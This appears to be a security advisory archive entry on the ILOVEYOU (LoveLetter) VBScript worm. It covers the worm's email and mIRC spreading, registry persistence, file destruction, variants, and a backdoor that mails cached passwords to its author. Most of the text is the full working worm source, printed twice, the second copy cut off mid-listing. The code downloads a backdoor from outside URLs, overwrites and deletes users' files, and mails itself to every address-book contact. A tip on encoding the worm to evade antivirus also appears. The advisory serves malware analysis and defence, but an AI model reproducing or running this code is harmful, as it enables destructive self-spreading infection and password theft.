COMMAND
ILOVEYOU (worm)
SYSTEMS AFFECTED
Almost any based on MS Win systems
PROBLEM
Huh... Due to big mass that this worm created here's info about
it. A dangerous Visual Basic Script (VBScript) virus, dubbed the
"LoveLetter" or "ILOVEYOU" virus, has been spreading itself across
the Internet through email via Microsoft Outlook and through
Internet Relay Chat (IRC) using a popular IRC client named mIRC.
The virus is susceptible to activation whenever the Windows Script
Host features are enabled (this description is by ISS advisory).
Mail servers may incur mild to severe overloading and could crash
when flooded with an unexpected number of the ILOVEYOU messages.
The actual VBScript code performs a number of destructive tasks:
- modifies and creates various Windows registry entries
- launches Internet Explorer to download a backdoor program
which, once installed, captures network passwords and emails
this data to an account in the Philippines
- infects the local machine by creating many new copies of
itself and overwriting or hiding data files of specific
file types (including VBScript, JavaScript, JPEG, and
MP2/MP3)
- spreads itself to other users by using information from the
Microsoft Outlook Address Book, as well as mIRC's DCC
feature, which allows chat participants to exchange files
Visual Basic Scripts can be executed if Windows Script Host (WSH)
is installed and enabled. Windows Script Host is installed by
default with Windows 98 and with Internet Explorer version 4.0
and later. The message is very identifiable. The subject is
always "ILOVEYOU", and the body of the email only contains the
message "kindly check the attached LOVELETTER coming from me."
The email contains a single instance of the virus in the form of
an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs".
For each address list that is found, a counter is kept in the
registry to track the number of users that have been mailed. The
number of email addresses in the address list is also recorded.
If the number of addresses in the list increases, the virus will
enumerate the individuals again and send out the "ILOVEYOU" mail
to those who have not previously received it. All flags are kept
in HKEY_CURRENT_USER\Software\Microsoft\WAB.
The virus uses Internet Explorer to connect one of four HTTP web
locations in an attempt to download a backdoor program called
WIN-BUGSFIX.EXE. This backdoor program captures any network
passwords it identifies and automatically emails this information
to a mail account in the Philippines, controlled by the author of
the virus. Before Internet Explorer is launched, the following
registry entry, which sets the Internet Explorer start page, is
changed to one of four URLs at random:
\Software\Microsoft\Internet Explorer\Main\Start Page
After the executable is downloaded, the start page value is set to
"about:blank". The following registry entry is created (under
HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
It seems the WIN-BUGSFIX.exe file will email any cached passwords
to MAILME@SUPER.NET.PH. Zoa_Chien points out that the
WIN-BUGSFIX.exe program connects to the SMPT server at
199.108.232.1 port 25 to send out its email message. You should
block the address at your firewall. The message looks as follow:
To: mailme@super.net.ph
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: kakker
Username: Default
IP Address: 10.67.101.123
RAS Passwords:
Cache Passwords:
BLABLA\MPM : xxx
BJORN\MUSIC : xxx
TOM\SHARED : xxx
TOM2\MP3 : xxx
www.server.com/ : xxx:xxx
MAPI : MAPI
where all xxx's stand for plaintext usernames and passwords of SMB
shares in the subnet.
The virus identifies any "Fixed" or "Removable" drives connected
to the system and recursively visits each folder, overwriting
files of any of the following extensions with a copy of itself,
changing the extension to ".vbs" and deleting the original file:
vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Script Host
sct - Scriptlet file
hta - HTML Application
The virus deletes any .jpg and .jpeg compressed image files, and
replaces by a copy of the virus with ".vbs" appended to the end
of the original file name. Original copies of any MP3 or MP2
audio files found are preserved, but a copy of the virus is
created using the same file name with ".vbs" appended. The
original MP2/MP3 file's attributes will be changed so the file is
hidden.
If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", or "mirc.hlp" are found, a new default
initialization script named "script.ini" is created in the same
directory:
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
This script will attempt to send a copy of the pre-generated HTML
page to any user who is seen joining any channel you are in on
IRC.
Steve Wolfe posted a brief analysis of the "iloveyou" worm. The
virus proliferates itself via email, sending letters with the
subject "ILOVEYOU", and in the body, "kindly check the attached
LOVELETTER coming from me." Attached is a VBScript file called
"I-LOVE-YOU.TXT.vbs". The capitalization is apparently an
attempt to fool users if they are not looking carefully, upon
seeing the ".TXT", they think the file is a (safe) text file, and
run it. Once executed, the script does the following:
1. If the key "HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout" is set to a positive number
in the registry, it is set to zero. If it is not present, it
is not affected.
2. The VBScript then saves a copy of itself to:
(a). \%%WINDIR%%\Win32DLL.vbs
(b). \%%SYSDIR%%\MSKernel32.vbs
(c). \%%SYSDIR%%\LOVE-LETTER-FOR-YOU.TXT.vbs
3. Sets the appropriate registry entries to start it on boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 => (b)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL => (a)
4. Changes the MSIE home page to a presumably malicious URL. If
the file "WinFAT32.exe" exists, then it sets the startup page
(contained in the registry setting
(HKCU\Software\Microsoft\Internet Explorer\Main\Start Page)
to one of the following URL's:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
5. If the "WIN-BUGSFIX.exe" file exists, it then sets it to run
at boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX = > (download directory)\win-bugsfix.exe
and also sets the MSIE startup page to about:blank (a blank
page).
6. It then prints out HTML, containing these messages:
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX
7. The ActiveX then sets the registry entries to make it run at
boot, as in step #3, and writes the files as in step 2.
8. The virus spreads itself. It opens up a MAPI connection to
your Outlook address list, and sends a copy of itself to each
of the entries.
9. Enumerates disk drives and infects files.
In infecting the files, it searches each of the drives found,
and does the following:
(A) Any file with the extensions .vbs, .vbe, .js, .jse, .css,
.wsh, .sct, .hta, .jpg, or .jpeg are relaced with a copy
of the virus. Then, it appears that a copy of the virus
is also written to the name of the file with ".vbs"
attached - for example, "logo.jpg" would be replaced with
the virus, and a file called "logo.jpg.vbs" would be
created as well.
(B) If any file with the extensions .mp2 or .mp3 is
encountered it will mark that file as hidden, then it will
create a copy of itself with that name with the .vbs
extensions - for example, "macarena.mp3" would be hidden,
and a copy of the virus written to "macarena.mp3.vbs".
(C) If mirc32.exe, mirc.ini, script.ini, mirc.hlp or
mlink32.exe is encountered it will write to the script.ini
in that directory, and modify it so that anyone joining a
channel will be automatically sent a copy of
LOVE-LETTER-FOR-YOU.htm, containing the virus.
It seems a couple of variations of the worm are going around. At
least one uses a subject line of "Joke" or "fw: Joke" and the
attachment is called VeryFunny.vbs or the one that talks about
Mothers Day.
You can find the source of the original worm at:
http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1
Here it is:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
ISS and others had become aware of several other variants of this
virus as shown below. Please note that modifying the virus is
trivial and that new versions may be distributed at any time.
- Subject: fwd: Joke
Attachment: Very Funny.vbs
- Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
- Subject: Mothers Day Order Confirmation
Body: We have proceeded to charge your credit card for the
amount of $326.92 for the mothers day diamond special. We
have attached a detailed invoice to this email. Please
print out the attachment and keep it in a safe place. Thanks
Again and Have a Happy Mothers Day!
mothersday@subdimension.com
Attachment: mothersday.vbs
When the attachment is opened, the malicious VBScript code
launches, performing the following operations in sequence:
- The virus removes the timeout associated with the Windows
scripting unit by changing the value of the
HKEY_CURRENT_USER\Software\Microsoft\ Windows Scripting Host\Settings\Timeout
registry key.
- The virus copies itself to SYSTEMDIR\MSKernel32.vbs,
WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs
- The following registry entries are created under
HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and
Win32DLL.vbs copies will be launched at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Win32DLL.vbs is created as a service.
- An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for
later use (in the mIRC script) and placed in the Windows
SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is
C:\WINDOWS\SYSTEM.
- The virus attempts to spread itself via e-mail using Microsoft
Outlook. It sends a message to all addresses found in every
address book. Each individual is flagged in the registry after
they have been sent a copy.
For each address list that is found, a counter is kept in the
registry to track the number of users that have been mailed.
The number of email addresses in the address list is also
recorded. If the number of addresses in the list increases,
the virus will enumerate the individuals again and send out
the "ILOVEYOU" mail to those who have not previously received
it.
All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB
- The virus uses Internet Explorer to connect one of four HTTP
web locations in an attempt to download a backdoor program
called WIN-BUGSFIX.EXE. This backdoor program captures any
network passwords it identifies and automatically emails this
information to a mail account in the Philippines, presumably
controlled by the author of the virus.
The original download locations for the WIN-BUGSFIX.EXE file
seem to be invalid. Be aware that modified versions of the
virus may point to valid copies of the backdoor, so this is
still a threat. Before Internet Explorer is launched, the
following registry entry, which sets the Internet Explorer
start page, is changed to one of four URLs at random:
\Software\Microsoft\Internet Explorer\Main\Start Page
After the executable is downloaded, the start page value is
set to "about:blank". The Mother's Day variation of the
virus does not attempt to install the backdoor, but does
modify the Internet Explorer start page.
- The following registry entry is created (under
HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time:
\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE
- The virus identifies any local or network drives connected to
the system and recursively visits each folder, overwriting
files of any of the following extensions with a copy of
itself, changing the extension to ".vbs" and deleting the
original file:
vbs - Visual Basic Script
vbe - Visual Basic Script (Encoded)
js - JavaScript
jse - JavaScript (Encoded)
css - Cascading Style Sheets
wsh - Windows Scripting Host
sct - Scriptlet file
hta - HTML Application
The virus deletes any ".jpg" and ".jpeg" compressed image
files, and replaces a copy of the virus with ".vbs" appended
to the end of the original file name. The Mother's Day
variation of the virus removes files of type ".ini" (Windows
script files) and ".bat" (DOS batch files) instead of ".jpg"
and ".jpeg". Original copies of any MP3 or MP2 audio files
found are preserved, but a copy of the virus is created using
the same file name with ".vbs" appended. The original MP2/MP3
file's attributes will be changed so the file is hidden.
- If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini",
"script.ini", or "mirc.hlp" are found, a new default
initialization script named "script.ini" is created in the
same directory:
[script]
;mIRC Script
; Please dont edit this script... mIRC will corrupt, if mIRC will
; corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
n3=}
This script will attempt to send a copy of the pre-generated
HTML page to any user who is seen joining any channel you are
in on IRC.
Sean Malloy is letting us known that changing the virus to use a
WSF extension instead of VBS is just as affective. WSF stands
for Windows Scripting File. Antivirus vendors that want to be
proactive might want to add this extension to their signatures.
The file contents would look something like this:
<job id="iloveyou">
<script language="VBScript">
'insert code here
</script>
</job>
or as Sean points out you could encode it to obfuscate it by
doing:
<job id="iloveyouencrypted">
<script language="VBScript.Encode">
#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@
</script>
</job>
where "#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@' is the
encoded worm. It seems the "fwd: Joke" variant attachment is
"Very Funny.vbs" (note the space) and not "VeryFunny.vbs". Or
maybe its a new variant.
Very Funny.vbs:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\Very Funny.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
